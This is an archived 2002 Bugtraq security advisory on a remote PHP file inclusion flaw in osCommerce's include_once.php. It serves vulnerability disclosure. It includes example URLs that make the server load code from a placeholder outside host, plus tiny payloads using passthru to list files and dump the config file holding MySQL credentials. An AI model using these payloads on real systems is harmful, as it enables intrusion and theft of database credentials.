Home page logo
/

bugtraq logo Bugtraq mailing list archives

PHP source injection in osCommerce
From: Tim Vandermeerch <Tim.Vandermeersch () pandora be>
Date: 16 Jun 2002 15:36:03 -0000



PHP source injection in osCommerce
----------------------------------

Product Description

osCommerce is an open source e-commerce solution under on going 
development by the open source community. Its feature packed out-of-the-
box installation allows store owners to setup, run, and maintain their 
online stores with minimum effort and with no costs involved. It can be 
found at http://www.oscommerce.com

Tested version

Preview Release 2.1 (06/03/2001)
(this is a preview version, but there are alot of online shops who use 
this)


The Problem

osCommerce commes with a file called /catalog/includes/include_once.php, 
and looks like this:

-------- include_once.php --------
<?
  if (!defined($include_file . '__')) {
    define($include_file . '__', 1);
        include($include_file);
  }
?>
----------------------------------

If someone request a URL like 
http://SERVER/catalog/inludes/include_once.php?
include_file=FILE_WE_WANT_TO_INCLUDE, he would be able to include any code 
he wants

This could be a serious problem because this user could query the SQL 
server and get acccess to other important files...

Examples

-------- Example 1 --------
http://SERVER/catalog/inludes/include_once.php?
include_file=http://MYBOX/a.php

--- a.php ---
<? passthru("/bin/ls")?>
-------------
Output: dir listing of the current dierctory
---------------------------

-------- Example 2 --------
http://SERVER/catalog/inludes/include_once.php?
include_file=http://MYBOX/b.php

--- b.php ---
<? passthru("/bin/cat application_top.php")?>
-------------
Output: outputs the application_top.php file wich includes MySQL username, 
password, ...
---------------------------

I informed the vendor and hope that they will release a patch soon

------------------------------
Tim Vandermeersch
Tim.Vandermeersch () pandora be


  By Date           By Thread  

Current thread:
  • PHP source injection in osCommerce Tim Vandermeerch (Jun 17)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]